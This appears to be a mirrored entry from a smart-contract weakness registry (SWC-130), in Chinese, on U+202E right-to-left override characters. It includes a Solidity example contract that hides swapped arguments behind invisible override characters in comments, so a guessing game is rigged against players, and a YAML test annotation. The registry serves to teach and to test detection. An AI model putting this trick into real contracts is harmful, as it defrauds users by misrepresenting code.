SWC智能合约漏洞库

在线工具推荐: Three.js AI纹理开发包 - YOLO合成数据生成器 - GLTF/GLB在线编辑 - 3D模型格式在线转换 - 可编程3D场景编辑器

SWC-130/使用反向控制字符(U+202E)

恶意行为者可以使用从右向左覆盖的Unicode字符来强制RTL文本呈现,并使用户混淆合约的真正意图。

CWE漏洞分类

CWE-451:关键信息的用户界面错误表示

整改方案

U+202E字符很少有合法用途。它不应出现在智能合约的源代码中。

参考文献

示例合约

guess_the_number.sol

/*
 * @source: https://youtu.be/P_Mtd5Fc_3E
 * @author: Shahar Zini
 */
pragma solidity ^0.5.0;

contract GuessTheNumber
{
    uint _secretNumber;
    address payable _owner;
    event success(string);
    event wrongNumber(string);

    constructor(uint secretNumber) payable public
    {
        require(secretNumber <= 10);
        _secretNumber = secretNumber;
        _owner = msg.sender;    
    }

    function getValue() view public returns (uint)
    {
        return address(this).balance;
    }

    function guess(uint n) payable public
    {
        require(msg.value == 1 ether);

        uint p = address(this).balance;
        checkAndTransferPrize(/*The prize‮/*rebmun desseug*/n , p/*‭
                /*The user who should benefit */,msg.sender);
    }

    function checkAndTransferPrize(uint p, uint n, address payable guesser) internal returns(bool)
    {
        if(n == _secretNumber)
        {
            guesser.transfer(p);
            emit success("You guessed the correct number!");
        }
        else
        {
            emit wrongNumber("You've made an incorrect guess!");
        }
    }

    function kill() public
    {
        require(msg.sender == _owner);
        selfdestruct(_owner);
    }
}

guess_the_number.yaml

description: Right-To-Left-Override control character (U+202E) user confusion
issues:
- id: SWC-130
  count: 1
  locations:
  - bytecode_offsets: {}
    line_numbers:
      guess_the_number.sol: [31]